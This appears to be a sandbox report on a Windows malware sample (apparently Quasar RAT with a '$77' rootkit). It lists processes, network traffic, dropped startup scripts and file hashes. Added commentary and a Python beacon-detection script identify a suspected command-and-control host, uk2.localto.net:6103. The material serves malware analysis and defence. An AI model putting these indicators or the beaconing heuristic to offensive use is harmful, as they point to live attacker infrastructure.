C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 1d679715d5407b760285820cf4763357 9tEy7hausUWQgnbhTvmrsA.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3588 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5552 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6676 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3544 /prefetch:8

C:\Users\Admin\Downloads\MBSetup.exe

"C:\Users\Admin\Downloads\MBSetup.exe"

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe

"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 uk2.localto.net udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.73:443 login.microsoftonline.com tcp
US 8.8.8.8:53 www.malwarebytes.com udp
US 192.0.66.233:443 www.malwarebytes.com tcp
US 192.0.66.233:443 www.malwarebytes.com tcp
US 8.8.8.8:53 services.bingapis.com udp
US 8.8.8.8:53 dev.visualwebsiteoptimizer.com udp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
US 8.8.8.8:53 stats.wp.com udp
US 8.8.8.8:53 plausible.io udp
GB 143.244.38.136:443 plausible.io tcp
US 8.8.8.8:53 233.66.0.192.in-addr.arpa udp
US 8.8.8.8:53 137.102.96.34.in-addr.arpa udp
US 8.8.8.8:53 42.215.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 136.38.244.143.in-addr.arpa udp
GB 143.244.38.136:443 plausible.io tcp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com udp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com udp
US 8.8.8.8:53 genesis.malwarebytes.com udp
US 54.225.65.73:443 genesis.malwarebytes.com tcp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
US 192.0.76.3:443 stats.wp.com tcp
US 192.0.76.3:443 stats.wp.com tcp
US 8.8.8.8:53 73.65.225.54.in-addr.arpa udp
US 8.8.8.8:53 3.76.0.192.in-addr.arpa udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 52.178.19.104.in-addr.arpa udp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 pixel.wp.com udp
US 104.18.33.89:443 www2.bing.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 172.64.155.119:443 geolocation.onetrust.com tcp
US 8.8.8.8:53 api.demandbase.com udp
US 8.8.8.8:53 89.33.18.104.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 119.155.64.172.in-addr.arpa udp
US 8.8.8.8:53 www-api.malwarebytes.com udp
US 18.245.199.30:443 www-api.malwarebytes.com tcp
US 18.245.199.30:443 www-api.malwarebytes.com tcp
US 18.245.199.30:443 www-api.malwarebytes.com tcp
US 18.245.199.30:443 www-api.malwarebytes.com tcp
FR 18.164.52.107:443 api.demandbase.com tcp
FR 18.164.52.107:443 api.demandbase.com tcp
US 8.8.8.8:53 107.52.164.18.in-addr.arpa udp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 api2.amplitude.com udp
US 35.164.70.144:443 api2.amplitude.com tcp
US 8.8.8.8:53 144.70.164.35.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 ark.mwbsys.com udp
US 54.225.191.79:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
FR 99.86.91.41:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 79.191.225.54.in-addr.arpa udp
US 8.8.8.8:53 41.91.86.99.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 54.225.191.79:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
FR 99.86.91.87:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 87.91.86.99.in-addr.arpa udp
US 54.225.191.79:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
FR 99.86.91.41:443 cdn.mwbsys.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 54.225.191.79:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
FR 99.86.91.41:443 cdn.mwbsys.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
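
Most of the table above is browser and installer traffic from the Edge and MBSetup.exe processes listed earlier (bing.com, malwarebytes.com, wp.com, onetrust, amplitude) plus the sandbox's own reverse lookups of every peer it saw. The one destination that does not fit is 140.238.91.110:6103 (uk2.localto.net): the only TCP endpoint on a non-web port, contacted again and again across the run, which is the pattern the Quasar tag in the summary predicts for its C2 channel. The Python below is an added example, not part of the report: it parses rows in this table's layout and surfaces repeated non-web TCP destinations, ignoring the PTR noise. NETWORK_ROWS is a copied excerpt, so the hit count it reports is for the excerpt, not the full table.

```python
from collections import Counter, defaultdict

# Excerpt of the Network table above, copied row for row (the full table adds more
# www.bing.com, malwarebytes.com and in-addr.arpa rows of the same shapes).
# Columns: Country Destination Domain Proto; the mDNS row has no Domain column.
NETWORK_ROWS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 uk2.localto.net udp
GB 140.238.91.110:6103 uk2.localto.net tcp
NL 23.62.61.97:443 www.bing.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 www.malwarebytes.com udp
US 192.0.66.233:443 www.malwarebytes.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 54.225.191.79:443 ark.mwbsys.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
"""

WEB_PORTS = {80, 443}


def parse_rows(text):
    """Whitespace-split rows into dicts; tolerate the 3-column (no Domain) form."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 4:
            country, dest, domain, proto = fields
        elif len(fields) == 3:
            country, dest, proto = fields
            domain = ""
        else:
            continue
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def resolved_hosts(rows):
    """domain -> set of IPs, read from the TCP rows that carry the resolved name."""
    out = defaultdict(set)
    for r in rows:
        if r["proto"] == "tcp" and r["domain"]:
            out[r["domain"]].add(r["ip"])
    return dict(out)


def find_beacons(rows, min_hits=3):
    """Repeated TCP connections to the same non-web ip:port, most frequent first."""
    hits = Counter((r["ip"], r["port"], r["domain"]) for r in rows
                   if r["proto"] == "tcp" and r["port"] not in WEB_PORTS)
    return [{"ip": ip, "port": port, "domain": domain, "hits": n}
            for (ip, port, domain), n in hits.most_common() if n >= min_hits]


def ptr_lookups(rows):
    """Reverse (in-addr.arpa) queries: the sandbox naming peers, not malware traffic."""
    return [r["domain"] for r in rows if r["domain"].endswith(".in-addr.arpa")]


if __name__ == "__main__":
    rows = parse_rows(NETWORK_ROWS)
    for b in find_beacons(rows):
        print(f"beacon: {b['domain'] or '-'} {b['ip']}:{b['port']} x{b['hits']}")
```

The port filter is the weak point of this heuristic: a C2 that speaks on 443 would need the TLS fingerprint or the connecting process, not the port, to stand out. For this sample the domain, IP and port together are the indicators worth blocking, and the domain should be preferred over the IP since tunnelled hosts like this one can move.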

Files

memory/2756-0-0x00007FFD6E1A3000-0x00007FFD6E1A5000-memory.dmp

memory/2756-6-0x00000239F15B0000-0x00000239F15D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nsobb0z2.n12.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2756-11-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/2756-12-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/2756-13-0x00000239EEDF0000-0x00000239EEDF8000-memory.dmp

memory/2756-14-0x00000239F99F0000-0x00000239F9E8E000-memory.dmp

memory/1188-25-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/1188-26-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/1188-27-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/1188-30-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

C:\Users\Admin\AppData\Roaming\startup_str_33.vbs

MD5 e54e8261acfbe96de2fd1d3a67ab9cc7
SHA1 a14a733b7db143cd1cdbd0fc2302b60447dd0ac4
SHA256 2f80f19c84919d0232943292bb3aee695f852dffbdcf4e70fb86039c6e430c8a
SHA512 f6f0bef9a17d4e367264db359ec1979983f286a398bae678ed8baadbc0cf6fc490c84317832031cc29f7d2d8bc8da6c2972b8461d59a295ec5e6ff7f41477af5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 773440cd6eb4e778c7d2115d1f231f75
SHA1 4b600aa41fcd267817961c95b104a0717c40e558
SHA256 64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c
SHA512 af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35

C:\Users\Admin\AppData\Roaming\startup_str_33.bat

MD5 e984ebea899379a8c0a47f9308c7370b
SHA1 863330006bef4c55a1bc79771ae989dc0412f717
SHA256 9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
SHA512 70934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975

memory/2756-49-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/4592-54-0x000001F3E03D0000-0x000001F3E06F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Install.exe

MD5 b51552b77057c2405f73bbbf9c89234a
SHA1 4793adbba023f90d2d2ad0ec55199c56de815224
SHA256 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

C:\Users\Admin\AppData\Local\Temp\Token Generator.exe

MD5 6d2ad4ada4961027832e557db06fc08d
SHA1 816018499f5e291850d7dd2a0d15c914e5607630
SHA256 139ce0f6ed1d745a6776f831c641b2b30bb8d48ecd9c198a0b4bd8489899f60e
SHA512 1d99985c99fa16f712eee5604279463e18e77532e7a1586651178685ef38ba25b099c393edc44f2703d7e9f4ce7596b86ba3d9f0e00119e13474816a2186f241

memory/4932-72-0x00000000006E0000-0x0000000000A04000-memory.dmp

C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/4860-88-0x0000022A3F940000-0x0000022A3F96A000-memory.dmp

memory/4860-90-0x00007FFD8BEC0000-0x00007FFD8BF7E000-memory.dmp

memory/4860-89-0x00007FFD8C6B0000-0x00007FFD8C8A5000-memory.dmp

memory/3524-94-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-96-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-93-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-92-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-91-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-100-0x00007FFD8BEC0000-0x00007FFD8BF7E000-memory.dmp

memory/3524-99-0x00007FFD8C6B0000-0x00007FFD8C8A5000-memory.dmp

memory/624-106-0x0000026578650000-0x000002657867A000-memory.dmp

memory/624-112-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/340-141-0x000001DDBEE60000-0x000001DDBEE8A000-memory.dmp

memory/340-142-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/960-132-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/960-131-0x0000021AC4410000-0x0000021AC443A000-memory.dmp

memory/960-126-0x0000021AC4410000-0x0000021AC443A000-memory.dmp

memory/340-136-0x000001DDBEE60000-0x000001DDBEE8A000-memory.dmp

memory/684-122-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/64-152-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/64-151-0x000002917CF70000-0x000002917CF9A000-memory.dmp

memory/64-146-0x000002917CF70000-0x000002917CF9A000-memory.dmp

memory/684-121-0x00000165F6AD0000-0x00000165F6AFA000-memory.dmp

memory/684-116-0x00000165F6AD0000-0x00000165F6AFA000-memory.dmp

memory/624-111-0x0000026578650000-0x000002657867A000-memory.dmp

memory/624-105-0x0000026578650000-0x000002657867A000-memory.dmp

memory/624-104-0x0000026578280000-0x00000265782A5000-memory.dmp

memory/3524-101-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3380-829-0x000000001B970000-0x000000001B9C0000-memory.dmp

memory/3380-830-0x000000001DB20000-0x000000001DBD2000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 44f6efdb48829d5f3ea9f906e38577f3
SHA1 7393c5041171df0abb63d5ab3c3ca1d6fb16f7c9
SHA256 2ef83506a9e2573d640b2d2ee44f0249a0c05af64cb47b6c5b5b82db8609afa7
SHA512 0a9d6d2ac5e3fdd5b94457e19014771e7ba87d969a394895952908361cd28fad53958720859c7839bb1ada0eb316b5bee161a81d33b4b6a0783d6caa20647dc7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b2a1398f937474c51a48b347387ee36a
SHA1 922a8567f09e68a04233e84e5919043034635949
SHA256 2dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6
SHA512 4a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c

\??\pipe\LOCAL\crashpad_4772_VWWUCWXTEPFHAMKA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1ac52e2503cc26baee4322f02f5b8d9c
SHA1 38e0cee911f5f2a24888a64780ffdf6fa72207c8
SHA256 f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4
SHA512 7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5731d795d71971e52b40b7c55cdef698
SHA1 5f1a9ee502d2d57dfd6443f89a282334aa37cf0f
SHA256 13d578ee1bd007ffbf4e5c8cb0b482498b6f828fc1c7290b3acf52684f580c41
SHA512 3cf1c2755668789779eed97ce628f87925e6429eeec6ebd0f22b11fe950a6fb2a36db89a3f0df8021895f6f332154d56283ff5fb2df86c26ce4489be0cf3db0c

memory/3380-928-0x000000001E450000-0x000000001E978000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 3579e069ca540bfd1b563efb885cf1e5
SHA1 78ae9ef7462aee2fdb96e6b27572c78453b559db
SHA256 bf81c20c915a56bb6711a67c698dfd901034e63f16eb7229a40a65989b9a7960
SHA512 5eb2a64ea5edc4c222188c98568011058851376bff028481b1b619ad13c79fc8bda9532bf82e5970c3088379f5a3df35359410c067a9b1d48fa8a45c5b1c8c51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 353d7a19aa651ac6d6352de6aaf0eded
SHA1 6ceb4279a37d6993b1cfbcdc96a1523230f5eaab
SHA256 70a6df6f3f32954b470e60cc725aaf9ef0ab35f240e87dd6b07e84b5185c5de3
SHA512 585c91ae95caaf8fba65ea672545670078b7f77f68de4889910dd4578c68eb613615044095d047e1046f4367520301d786e7ce471b2c2a17bb72648ab02c2088

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 4fb719e73f3871cdea53cb2512bed553
SHA1 9faa8307a990e55fc2f10d0734915b294a4a7426
SHA256 5c17f8a87cbbf7340a4ade49431daf6c37fde44ecc82c67ce516d0a624caa271
SHA512 9a27278cda83d6635bbab0c812530506c09f8d4ffe95198d18a51a86d49fe9d13437c5f923c18402fc4a84ede5a8ce74029665ed99d0c954c547fd9e53c89883

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
